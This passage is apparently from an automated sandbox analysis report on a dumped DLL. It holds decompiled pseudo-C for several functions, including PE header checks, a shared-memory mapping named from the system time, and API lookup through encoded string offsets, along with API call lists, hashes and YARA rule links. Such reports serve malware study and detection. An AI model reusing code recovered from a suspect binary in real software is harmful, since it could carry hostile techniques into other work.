										__eflags =  *0x6d4841c0;
										if( *0x6d4841c0 != 0) {
											goto L60;
										}
										_t84 =  *0x6d484178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6d4841c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6d484178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6d484180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6d48417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6d484180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d484180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6d4841c0 = 1;
							__eflags =  *0x6d4841c0;
							if( *0x6d4841c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6d484180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6d484180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6d4841c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6d484180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6d484178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6d484180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d484180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6d4823af
0x6d4823b2
0x6d4823b8
0x6d4823d6
0x00000000
0x6d4823d6
0x6d4823c0
0x6d4823c9
0x6d4823cf
0x6d4823de
0x6d4823e1
0x6d4823e4
0x6d4823ee
0x6d4823ee
0x6d4823f0
0x6d4823f3
0x6d4823f5
0x6d4823f5
0x6d4823f7
0x6d4823fa
0x00000000
0x00000000
0x6d4823fc
0x6d4823fe
0x6d482464
0x6d482464
0x6d4825c2
0x00000000
0x6d4825c2
0x6d482400
0x6d482400
0x6d482404
0x6d482406
0x6d482406
0x6d482406
0x6d482406
0x6d482409
0x6d48240a
0x6d48240d
0x6d48240d
0x6d482411
0x6d482415
0x6d482423
0x6d482423
0x6d48242b
0x6d482431
0x6d482433
0x6d482435
0x6d482445
0x6d482452
0x6d482456
0x6d48245b
0x6d48245d
0x6d4824db
0x6d4824db
0x6d48245f
0x6d48245f
0x6d48245f
0x6d4824dd
0x6d4824df
0x6d4825c0
0x6d4825c0
0x00000000
0x6d4824e5
0x6d4824e5
0x6d4824ec
0x00000000
0x00000000
0x6d4824f2
0x6d4824f6
0x6d482552
0x6d482554
0x6d48255c
0x6d48255e
0x6d482560
0x00000000
0x00000000
0x6d482562
0x6d482568
0x6d48256a
0x6d48256c
0x6d482581
0x6d482581
0x6d482583
0x6d4825b2
0x6d4825b9
0x00000000
0x6d4825b9
0x6d482587
0x6d482588
0x6d48258a
0x6d48258c
0x6d48258c
0x6d48258e
0x6d482590
0x6d482592
0x6d4825a6
0x6d4825a6
0x6d4825a9
0x6d4825ab
0x6d4825ab
0x6d4825ac
0x6d4825ac
0x00000000
0x6d482594
0x6d482594
0x6d482594
0x6d48259d
0x6d48259e
0x6d4825a0
0x6d4825a2
0x6d4825a2
0x00000000
0x6d482594
0x6d482592
0x6d48256e
0x6d482575
0x6d482575
0x6d482577
0x00000000
0x00000000
0x6d482579
0x6d48257a
0x6d48257d
0x6d48257f
0x00000000
0x00000000
0x00000000
0x6d48257f
0x00000000
0x6d482575
0x6d4824f8
0x6d4824fb
0x6d482500
0x00000000
0x00000000
0x6d482509
0x6d48250b
0x6d482511
0x00000000
0x00000000
0x6d482517
0x6d48251d
0x00000000
0x00000000
0x6d482523
0x6d482525
0x6d48252e
0x6d482532
0x00000000
0x00000000
0x6d482538
0x6d48253b
0x6d48253d
0x00000000
0x00000000
0x6d482544
0x6d482546
0x00000000
0x00000000
0x6d482548
0x6d48254c
0x00000000
0x00000000
0x00000000
0x6d48254c
0x00000000
0x00000000
0x00000000
0x6d482437
0x6d482437
0x6d482437
0x6d48243e
0x00000000
0x00000000
0x6d482440
0x6d482441
0x6d482443
0x00000000
0x00000000
0x00000000
0x6d482443
0x6d48246b
0x6d48246d
0x00000000
0x00000000
0x6d48247d
0x6d48247f
0x6d482481
0x00000000
0x00000000
0x6d482487
0x6d48248e
0x6d4824ba
0x6d4824ba
0x6d4824bc
0x6d4824be
0x6d4824d2
0x6d4824d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4824c0
0x6d4824c0
0x6d4824c0
0x6d4824c9
0x6d4824ca
0x6d4824cc
0x6d4824ce
0x6d4824ce
0x00000000
0x6d4824c0
0x6d482490
0x6d482493
0x6d482495
0x6d4824a7
0x6d4824a7
0x6d4824aa
0x6d4824ac
0x6d4824ac
0x6d4824ad
0x6d4824ad
0x6d4824b3
0x00000000
0x00000000
0x00000000
0x00000000
0x6d482497
0x6d482497
0x6d482497
0x6d48249e
0x00000000
0x00000000
0x6d4824a0
0x6d4824a0
0x6d4824a1
0x00000000
0x00000000
0x00000000
0x6d4824a1
0x6d4824a3
0x6d4824a5
0x6d4824b8
0x00000000
0x00000000
0x00000000
0x6d4824b8
0x00000000
0x6d4824a5
0x6d482417
0x6d48241a
0x6d48241d
0x00000000
0x00000000
0x6d48241f
0x6d482421
0x00000000
0x00000000
0x00000000
0x6d482421
0x6d4823e6
0x6d4823e8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6D482456

Memory Dump Source

Source File: 00000000.00000002.909910325.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000000.00000002.909897019.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909931853.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909941537.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909962633.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 8c9d44d807876f02a2a4c1a20b0c0584be861ba16d11a841bacb27dd76459d9b
Instruction ID: 9f4e71f401533098f86704bc466f1ab69ef3150c4264b081a3900e1b3df354a7
Opcode Fuzzy Hash: 8c9d44d807876f02a2a4c1a20b0c0584be861ba16d11a841bacb27dd76459d9b
Instruction Fuzzy Hash: 5261A4306446079BDB39CA28C8E0F2937F6EB467D9B348429D416D7287FB30DD828B60

Uniqueness

Uniqueness Score: -1.00%

Function 6D482184, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6D482184(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6D4822EB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6D4823A5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6D482290(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6D4822EB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6D482387(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6d482188
0x6d482189
0x6d48218a
0x6d48218d
0x6d48218f
0x6d482192
0x6d482193
0x6d482195
0x6d482196
0x6d482197
0x6d48219a
0x6d4821a4
0x6d482255
0x6d48225c
0x6d482265
0x6d4821aa
0x6d4821aa
0x6d4821b0
0x6d4821b6
0x6d4821b9
0x6d4821bc
0x6d4821c0
0x6d4821c5
0x6d4821ca
0x6d48224a
0x00000000
0x6d4821cc
0x6d4821cc
0x6d4821d8
0x6d4821da
0x6d482235
0x6d482235
0x6d48223b
0x00000000
0x6d4821dc
0x6d4821eb
0x6d4821ed
0x6d4821ee
0x6d4821ef
0x6d4821f2
0x6d4821f2
0x6d4821f4
0x00000000
0x6d4821f6
0x6d4821f6
0x6d482240
0x6d4821f8
0x6d4821f8
0x6d4821fc
0x6d482204
0x6d482209
0x6d48220e
0x6d48221a
0x6d482222
0x6d482229
0x6d48222f
0x6d482233
0x00000000
0x6d482233
0x6d4821f6
0x6d4821f4
0x00000000
0x6d4821da
0x6d48224e
0x6d48224e
0x6d48224e
0x6d4821ca
0x6d48226a
0x6d482271

Memory Dump Source

Source File: 00000000.00000002.909910325.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000000.00000002.909897019.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909931853.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909941537.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909962633.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 67545ea66a0acc7efeb81389fb5291775700288195519bb2cffbded5a5b2e6ea
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 0621A472904205ABD720DF68C8C0DA7F7A5BF493A0B468168D9199B246DB30FE15C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4F52AD, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.910131229.000000006D4F5000.00000040.00020000.sdmp, Offset: 6D4F5000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: b8d0ec2fce619d282021dd3cfc249c7c02c37c66e6b39b186a7fd4ad716d0618
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 6611B1733406009FD754CE99EC80EA6B3EAEBC92307268166ED04CB315E676EC02C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4F56A6, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.910131229.000000006D4F5000.00000040.00020000.sdmp, Offset: 6D4F5000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: d9d404585781f01cac1c816fc5b5c66ceb7ba6bb93e7835fea82d6b0aafdb860
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: 4501D2363181028FE705CB2CD884D79B7E4EBC1320B29C07EC45A87725E224EC43C520

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BAA10, Relevance: 19.7, APIs: 13, Instructions: 172COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 6D4BAA47
_strncmp.LIBCMT ref: 6D4BAA69
_strncmp.LIBCMT ref: 6D4BAA8B

Memory Dump Source

Source File: 00000000.00000002.909995385.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: _strncmp
String ID:
API String ID: 909875538-0
Opcode ID: 28f332509c3e04bda6981ab401a97c0a5d9544d532eab3747795b76b7c01a00b
Instruction ID: 430f00357fa3eb22fd6cf0ca8863f2b2d75dafbe10528a4b03d5accf5d5a5d0b
Opcode Fuzzy Hash: 28f332509c3e04bda6981ab401a97c0a5d9544d532eab3747795b76b7c01a00b
Instruction Fuzzy Hash: 1541D4EAB4961232D110AA1BBD03F5BA711AFF0796F048036FA15D6241E3B19D69C6F3

Uniqueness

Uniqueness Score: -1.00%

Function 6D481352, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6D481352(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6D482130();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6d484144;
				_push(_t15 + 0x6d48505e);
				_push(_t15 + 0x6d485054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6D48212A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x6d484148, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6d481352
0x6d48135b
0x6d48135f
0x6d481365
0x6d48136a
0x6d48136f
0x6d481372
0x6d481375
0x6d48137a
0x6d48137b
0x6d48137e
0x6d481389
0x6d481390
0x6d481394
0x6d481396
0x6d481397
0x6d48139a
0x6d48139f
0x6d4813a9
0x6d4813ab
0x6d4813ab
0x6d4813c5
0x6d4813c9
0x6d481419
0x6d4813cb
0x6d4813d4
0x6d4813ea
0x6d4813f2
0x6d481404
0x6d481408
0x00000000
0x00000000
0x6d4813f4
0x6d4813f7
0x6d4813fc
0x6d4813fe
0x6d4813fe
0x6d4813df
0x6d4813e1
0x6d48140a
0x6d48140b
0x6d48140b
0x6d4813d4
0x6d481421

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6D48149D,0000000A,?,?), ref: 6D48135F
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D481375
_snwprintf.NTDLL ref: 6D48139A
CreateFileMappingW.KERNEL32(000000FF,6D484148,00000004,00000000,?,?), ref: 6D4813BF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D48149D,0000000A,?), ref: 6D4813D6
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6D4813EA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D48149D,0000000A,?), ref: 6D481402
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D48149D,0000000A), ref: 6D48140B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D48149D,0000000A,?), ref: 6D481413

Memory Dump Source

Source File: 00000000.00000002.909910325.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000000.00000002.909897019.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909931853.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909941537.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909962633.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: e6d06e6f01d8273d59f4436f0d0557de8dc4f4f729507889d97925eaafad5e81
Instruction ID: 4c5aafa425dbcb09cf0766d04994db29f88272576b8ca934b976d908bab8cfed
Opcode Fuzzy Hash: e6d06e6f01d8273d59f4436f0d0557de8dc4f4f729507889d97925eaafad5e81
Instruction Fuzzy Hash: A2218372500148ABDB11AFA4CC88FAE77B9EB463D6F11402AF625E7245D770DD458760

Uniqueness

Uniqueness Score: -1.00%

Function 6D48150D, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D48150D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6D481CC8(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6d484144 + 0x6d485014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6d484144 + 0x6d485151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6D48133D(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6d484144 + 0x6d485161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6d484144 + 0x6d485174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6d484144 + 0x6d485189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6d484144 + 0x6d48519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6D4815F1(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6d48151b
0x6d48151f
0x6d4815e0
0x6d481525
0x6d48153d
0x6d48154c
0x6d481553
0x6d481555
0x6d48155a
0x6d4815d8
0x6d4815d9
0x6d48155c
0x6d481569
0x6d48156b
0x6d481570
0x00000000
0x6d481572
0x6d48157f
0x6d481581
0x6d481586
0x00000000
0x6d481588
0x6d481595
0x6d481597
0x6d48159c
0x00000000
0x6d48159e
0x6d4815ab
0x6d4815ad
0x6d4815b2
0x00000000
0x6d4815b4
0x6d4815ba
0x6d4815c0
0x6d4815c5
0x6d4815ca
0x6d4815cf
0x00000000
0x6d4815d1
0x6d4815d4
0x6d4815d4
0x6d4815cf
0x6d4815b2
0x6d48159c
0x6d481586
0x6d481570
0x6d48155a
0x6d4815ee

APIs

Part of subcall function 6D481CC8: HeapAlloc.KERNEL32(00000000,?,6D481C03,00000208,00000000,00000000,?,?,?,6D4812A1,?), ref: 6D481CD4

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6D4816D5,?,?,?,?,?,00000002,?,?), ref: 6D481531
GetProcAddress.KERNEL32(00000000,?), ref: 6D481553
GetProcAddress.KERNEL32(00000000,?), ref: 6D481569
GetProcAddress.KERNEL32(00000000,?), ref: 6D48157F
GetProcAddress.KERNEL32(00000000,?), ref: 6D481595
GetProcAddress.KERNEL32(00000000,?), ref: 6D4815AB

Part of subcall function 6D4815F1: memset.NTDLL ref: 6D481670

Memory Dump Source

Source File: 00000000.00000002.909910325.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000000.00000002.909897019.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909931853.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909941537.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909962633.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: 868e30ca4b36f8b16259c003dd7aec6fc2995990b70ca90dfb64a260589077db
Instruction ID: 08ecca54b87395504ec3312aade5657e8bd11b8affb128fed2537a7a649765df
Opcode Fuzzy Hash: 868e30ca4b36f8b16259c003dd7aec6fc2995990b70ca90dfb64a260589077db
Instruction Fuzzy Hash: 18212F71A0060F9FDB11EF79C984E6A77FDAF062C6711442AE51AD7211EB70ED11CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C4BCB, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6D4C4BF3

Part of subcall function 6D4C1407: __getptd.LIBCMT ref: 6D4C1415
Part of subcall function 6D4C1407: __getptd.LIBCMT ref: 6D4C1423

__getptd.LIBCMT ref: 6D4C4BFD

Part of subcall function 6D4C3307: __getptd_noexit.LIBCMT ref: 6D4C330A
Part of subcall function 6D4C3307: __amsg_exit.LIBCMT ref: 6D4C3317

__getptd.LIBCMT ref: 6D4C4C0B
__getptd.LIBCMT ref: 6D4C4C19
__getptd.LIBCMT ref: 6D4C4C24
_CallCatchBlock2.LIBCMT ref: 6D4C4C4A

Part of subcall function 6D4C14AC: __CallSettingFrame@12.LIBCMT ref: 6D4C14F8

Part of subcall function 6D4C4CF1: __getptd.LIBCMT ref: 6D4C4D00
Part of subcall function 6D4C4CF1: __getptd.LIBCMT ref: 6D4C4D0E

Memory Dump Source

Source File: 00000000.00000002.909995385.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: d22a1b97de8c1ad67e1874cb9b0ad41211ce3527959c21de219fc3ba20ff4d96
Instruction ID: a790352a6dc8fd3395c8c486d7777da748c9ef880dda594d97267d228449273c
Opcode Fuzzy Hash: d22a1b97de8c1ad67e1874cb9b0ad41211ce3527959c21de219fc3ba20ff4d96
Instruction Fuzzy Hash: 4A11C6B9D042499FDF00DFA4C548FADBBB0FF08318F118469E914A7260DB389E159F95

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C3880, Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6D4C388C

Part of subcall function 6D4C3307: __getptd_noexit.LIBCMT ref: 6D4C330A
Part of subcall function 6D4C3307: __amsg_exit.LIBCMT ref: 6D4C3317

__amsg_exit.LIBCMT ref: 6D4C38AC
__lock.LIBCMT ref: 6D4C38BC
InterlockedDecrement.KERNEL32(?), ref: 6D4C38D9
InterlockedIncrement.KERNEL32(6D4F3DA8), ref: 6D4C3904

Memory Dump Source

Source File: 00000000.00000002.909995385.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 400319c8366a1f39a0e00ada6c0bb172479757ac195dc247ea4e0cd77d4f2185
Instruction ID: dc67b0b2989b4fd147482865fc31bb01738eaae2fe2f580796008a79bec173b4
Opcode Fuzzy Hash: 400319c8366a1f39a0e00ada6c0bb172479757ac195dc247ea4e0cd77d4f2185
Instruction Fuzzy Hash: 6501843D905722ABDF21EBA5844DF5D77B0AF85718F114059E85467390CB349D41CBE3

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C0157, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 6D4C0175

Part of subcall function 6D4C1B7E: __mtinitlocknum.LIBCMT ref: 6D4C1B94
Part of subcall function 6D4C1B7E: __amsg_exit.LIBCMT ref: 6D4C1BA0
Part of subcall function 6D4C1B7E: RtlEnterCriticalSection.NTDLL(?), ref: 6D4C1BA8

___sbh_find_block.LIBCMT ref: 6D4C0180
___sbh_free_block.LIBCMT ref: 6D4C018F
HeapFree.KERNEL32(00000000,?,6D4F1A28,0000000C,6D4C1B5F,00000000,6D4F1AF8,0000000C,6D4C1B99,?,?,?,6D4C7A94,00000004,6D4F1E48,0000000C), ref: 6D4C01BF
GetLastError.KERNEL32(?,6D4C7A94,00000004,6D4F1E48,0000000C,6D4C58CA,?,?,00000000,00000000,00000000,?,6D4C32B9,00000001,00000214), ref: 6D4C01D0

Memory Dump Source

Source File: 00000000.00000002.909995385.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 3dffd6c8d060f9b8058af5940c881d13140e988247bc967d7c21ce1a68240fd4
Instruction ID: 8c216e8a47bdf9d1767214d04c1e279701f3c4059f743c0bb02103fe56f16591
Opcode Fuzzy Hash: 3dffd6c8d060f9b8058af5940c881d13140e988247bc967d7c21ce1a68240fd4
Instruction Fuzzy Hash: A401A2B9909312EAEF21AFB28904F5E7774AF01369F21410DE60476284DF358D41CAD7

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BDE60, Relevance: 6.3, APIs: 4, Instructions: 282COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 6D4BDF3A
_realloc.LIBCMT ref: 6D4BDFD8
_realloc.LIBCMT ref: 6D4BE07F

Memory Dump Source

